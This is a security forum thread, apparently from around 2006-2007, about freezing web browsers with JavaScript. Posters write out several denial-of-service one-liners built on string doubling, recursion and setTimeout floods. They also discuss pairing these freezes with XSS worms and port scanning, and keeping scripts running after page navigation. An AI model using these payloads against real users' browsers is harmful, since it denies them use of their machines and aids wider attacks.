I was going through the blog archives on ha.ckers, and bumped on this http://ha.ckers.org/blog/20060830/internet-explorer-dos/ regarding some IE DoS.

If the goal is simply to disable the browser, it's remarkably easy to do.
- Every browser runs javascript in a single thread. Netscape did some work that'd have allowed multithreading at some point, but even then a single html document could only use one single thread.
- There are enough UI events that javascript needs to react to synchronously that you can effectively freeze your browser UI by making sure javascript keeps busy.

Now, most browsers also have this defense mechanism that pops up a dialog similar to "A script is taking a long time to run. Kill it?", but those are pretty far from perfect.
They are good enough to catch something as obvious as:
javascript:while(1);

Let's take a quick look at 2 resource eaters here.
We're limiting ourselves to core ecmascript features, as those are (somehwat) guaranteed to work consistently across browsers.

1: String manipulation.
In javascript, every string operation equates a string creation. Not terribly efficient, but usually good enough.
javascript:a='a';while(a+=a);
Same basic loop, but with a new ever growing string creation on each iteration.
On firefox, this stops fairly quickly with an "Out of memory" error, after eating 100MB or so of RAM.
IE keeps going a while longer (longer than my patience anyway), and uses about as much RAM.

javascript:(function t(s){return t(s+s)})('a')
Same concept, but using recursion instead of a loop.
on firefox, same "out of memory" error, same 100MB limit.
on IE, this uses twice as much memory as the earlier version, but triggers an "out of stack space" error fairly quickly.

2: Asynchronous callbacks.
This is a lot better at freezing browsers. The idea is to schedule callbacks at a fast rate, and watch the browser struggle to handle them, leaving behind everything else (like handling UI events)
javascript:(function t(){setTimeout(t,0);setTimeout(t,0)})()
Here, every time t() gets called, 2 asynchronous callbacks to t() are scheduled to run as soon as possible.
on both IE and firefox, this kept the browser frozen longer than I felt like waiting.

Of course, why schedule only 2 callbacks at a time:
javascript:(function t(){while(setTimeout(t,0));})()
Same visible results on both browsers, although this is likely to be a bit more painful to handle.

To conclude, let's combine both resource eaters for maximum effect:

javascript:(function t(s){while(setTimeout(t,0,s))s+=s;})('a')
On firefox, this keeps the CPU at 100%, eats 1GB of RAM on my box (which happens to have 1GB of physical RAM), then swaps like crazy.
on IE, it ends up triggering a "not enough storage to complete an operation" error after eating a bit of RAM, but keeps the CPU usage at 100%.

There are plenty of variations on those techniques, and that's without looking at anything in the DOM yet.
For example, if your resource-wasting code is wrapped in a try{}catch{} block, you may be able to survive some of those errors mentioned above.

Overall it's safe to say that once you run javascript on someone's browser, you can easily deny them the use of their browser, and quite possibly the use of their computer for a little while.

That could be super useful if you can save some of those resources for other more malicious things. One of the things I've been thinking about (aside from the MITM DoS stuff that I mentioned in the blog) is both the XSS Warhol Worm as well as the JavaScript port scanner - both of which may take up quite a bit of time, and it would be good if you could essentially lock the computer while you were performing your task.

Hahah, well if we can overcome airgap security on this board, I'd be amazed. ;) I'd be happy just stalling them. Another way I've thought of them is playing something like this that keeps people occupied: http://www.badgerbadgerbadger.com/

Hell... why not, just ask for everything... cookies, flash, Java, etc... Not a bad idea... I mean 80% of the reason I ever have JavaScript turned on is for testing and the other 20% is Google's Adsense that require it. If it weren't for them I'd probably never have it turned on other than for testing.

> That could be super useful if you can save some of those resources for other more malicious things

I meant to respond to that earlier.
I'd argue that stealth and resiliency are a better strategy for survival than freezing the computer.
Stealth would cover hiding any signs of activity in the UI (the status bar is a big one), while resiliency would cover surviving a page navigation event.

Back in the days, one could write a java applet that would start a thread that could survive long after the original applet was unloaded, as long as the browser was still running. Similarly, one could pop-up a new window outside of the screen boundaries.
Nowadays, it's probably harder. However, add-ons on top of the regular browser sandbox are good candidates for this kind of oversight (java, greasemonkey & acrobat reader would all be worthy of a closer look for starters)

> - Every browser runs javascript in a single thread. Netscape did some work that'd have allowed multithreading at some point, but even then a single html document could only use one single thread.

They've apparently been busy since I last looked at that stuff..
The recent schmoocon presentation http://news.com.com/1606-2_3-6121987.html?part=rss&tag=6121987&subj=news claims FireFox has *some* threading remnants laying around, and they're right.

Take the following code sample:
javascript:void(setTimeout(function(){setTimeout("alert(1)",0);alert(2)},0))

Try and run this in IE and Opera, and any sane javascript interpreter, and you'll see "2" poping up before "1".
On firefox, you get "1" before "2", which should be impossible in a single-threaded interpreter.

I haven't dug deeper yet, but this could be loads of fun (until it gets fixed of course.)

That would make sense since Firefox was built off some of the old Netscape code right? I don't have my browser history down pat. I know that Netscape currently uses both Gecko and IE, but I'm not sure what the origins of Gecko are - I probably should since I've met a good chunk of the Mozilla guys.

Yes.
Netscape decided to open source their browser codebase back in 98, and created the Mozilla foundation to handle it.
It took a little while for mozilla to find its footing.
Some chunks of it ended up being pretty much entirely rewritten (like the browser UI code, that moved from 3 codebases, one for mac, one of unix and one for win32, to essentially one new mechanism, XUL.), and some chunks were kept exactly as is, and improved on as time went by (like the javascript interpreters, spidermonkey and rhino.)

In other news, the toorcon thing is kinda busted, according to this http://developer.mozilla.org/devnews/index.php/2006/10/02/update-possible-vulnerability-reported-at-toorcon/
That makes me sad.
When I see someone presenting a demo by cursing a lot, laughing after every sentence and mocking "linux fanboys", I expect solid stuff.

Still, this has potential. For example, this allows you to keep some js code running even after the browser navigated to a new page.
The only downside is, js code that runs into such a context has almost no access to any DOM stuff, so the only way I can even tell it runs is because it generates errors as it bumps into the sandbox.

God it's nice talking to someone who actually understands browsers! Okay, I've got a question I haven't seen answered anywhere. I'm assuming this is some sort of protection built in but I can't figure out where:

If you have an iframe to another domain and that page in the other domain has a link (HREF) to a javascript directive with target="_top" it just disables it.

Ok, so I'm wrong. Nothing remotely close to threading in javascript, even on Firefox.
The only trick happening here is that calls to alert/prompt/confirm are breaking the flow of execution of the current script, but aren't preventing timer-generated scripts from starting.

It's still bad enough to be probably exploitable in some way (working on it), but it's nothing close to what I was hoping for.

It's too bad... I had big plans for that, but you're right, both IE and Firefox have it disabled, so I'm guessing it's something they thought about. However, it occured to me that I've actually seen situations where JavaScript can create it's own psuedo domain for lack of a better term. When it's constructing HTML in a new window it that new window doesn't appear to be able to access cookies from the parent domain. That's what I figured would happen here, but instead it was completely disabled.

I once DoSsed Firefox (before FF2), and my computer for that matter, using JS. Firefox peaked at 89% CPU usage and hoevered there for a while. All 512MB of RAM got eaten and I received a "Your virtual memory is running low" or whatever it says, then the whole thing DoSsed, no cursor movement. CPU was crunchy for a couple of days after...

I still have a copy of the HTML/JS i used, but I did mess it up a bit. Assuming it won't cause any long-term damage at all I might try and revive it; would be interesting to know how exactly it worked. I'll post back if I get it fixed.

#edt- I believe it was some form of recursion(?) though accessing the "about" protocol using document.location...

Interesting... I've thought about doing that... if you had access to chrome I could easily DoS it by opening up many instances of Firefox, but I didn't know you could recurse in about. I'll be curious to see how you did it.

about:mozilla - clever people made this. It has references to firebird and thunderbird. It also has references to payware (MAMMON wiki it). Before sp2 this gave you a blue screen of death page in IE. Does any one know what 7:15 means to the Mozilla team?